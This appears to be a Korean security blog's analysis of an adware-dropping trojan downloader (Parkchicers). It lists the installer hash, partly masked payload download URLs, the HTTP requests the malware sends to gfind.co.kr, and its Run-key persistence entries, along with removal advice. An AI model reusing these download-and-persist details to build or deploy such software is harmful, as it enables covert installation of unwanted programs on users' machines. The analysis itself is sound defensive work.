해당 악성코드 설치 파일(MD5 : 90aaf263baa966c5ed232ffec5eab81a)에 대하여 마이크로소프트(Microsoft) 보안 제품에서는 TrojanDownloader:Win32/Parkchicers.A (VirusTotal : 36/42)진단명으로 진단되고 있습니다.
참고로 TrojanDownloader:Win32/Parkchicers 시리즈는 국내에서 제작된 악성코드로 다수의 변종이 발견되고 있는 것으로 보이므로 참고하시기 바랍니다.
또한 해당 설치 파일을 이용하여 사용자가 실행시마다 이 게시글에서 제시하는 프로그램 이외에 다른 악성 프로그램이 설치될 수 있습니다. 그러므로 여기에서 소개하는 설치 파일은 하나의 사례로 이해하시기 바랍니다.
h**p://g****.co.kr/basic/cn8cls/cn8cls.cim
h**p://114.***.112.***/igfxper.exe
h**p://g****.co.kr/basic/igfxper/igfxper._dll
h**p://114.***.112.***/GDownServices.exe
h**p://g****.co.kr/basic/GDownServices/GDownServices._dll
C:\Program Files\pdpopx\GDownServices.exe (AhnLab V3 : Win-Trojan/Agent.241152.AR)
C:\Windows\System\cn8cls.exe (AhnLab V3 : Win-Adware/Cn8cls.236544) ; 자가 복제 & 자가 삭제
설치된 파일들은 삭제 기능을 제공하지 않는 전형적인 악성코드로 Windows 시작시 GDownServices.exe / cn8cls.exe 2개의 파일을 시작 프로그램으로 등록하여 자동 실행되도록 구성되어 있습니다.
GET /basic/GDownServices/GDownServices._dll HTTP/1.1
User-Agent: IEUpdater
Host: gfind.co.kr
Connection: Keep-Alive
Cache-Control: no-cache
[cn8cls.exe 네트워크 연결 정보]
GET /basic/cn8cls/cn8cls.cim HTTP/1.1
User-Agent: IEUpdate
Host: gfind.co.kr
Connection: Keep-Alive
Cache-Control: no-cache
설치된 파일들은 시스템 시작시마다 gFind로 알려진 특정 인터넷 쇼핑 관련 사이트에서 정보를 받아오며, 해당 사이트는 특정 광고 코드를 포함하여 옥션(Aution)에서 운영하는 about 서비스로 연결되는 것을 확인할 수 있습니다.
최근 사용자 컴퓨터에 설치된 불특정 프로그램으로 인하여 GFind 사이트와 관련된 광고 행위 등으로 고생하시는 분들이 있는 것으로 알려져 있는데, 이런 분들은 반드시 사용자 시스템에 설치된 악성 파일을 찾아 제거를 하셔야 할 것으로 보입니다.
해당 악성코드 제거를 위해서는 유명 보안 제품을 통해 시스템 정밀 검사를 하시기 바라며, 레지스트리 정보는 다음과 같으므로 참고하시기 바랍니다.
HKEY_CURRENT_USER\Software\cn8cls
HKEY_CURRENT_USER\Software\GDownServices
HKEY_CURRENT_USER\Software\igfxper
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- cn8cls = C:\Windows\System\cn8cls.exe
- GDownServices = C:\Program Files\pdpopx\GDownServices.exe
- igfxper = C:\WINDOWS\system32\igfxper.exe
국내에서는 위와 같이 사용자 몰래(혹은 정상적인 방식으로) 설치된 프로그램 중에는 사용자가 인지하지 못하는 과정에서 상업적 수익을 생성하는 동작이 있으므로 프로그램 설치시에는 해당 프로그램에 대한 정보를 충분히 확인하시기 바랍니다.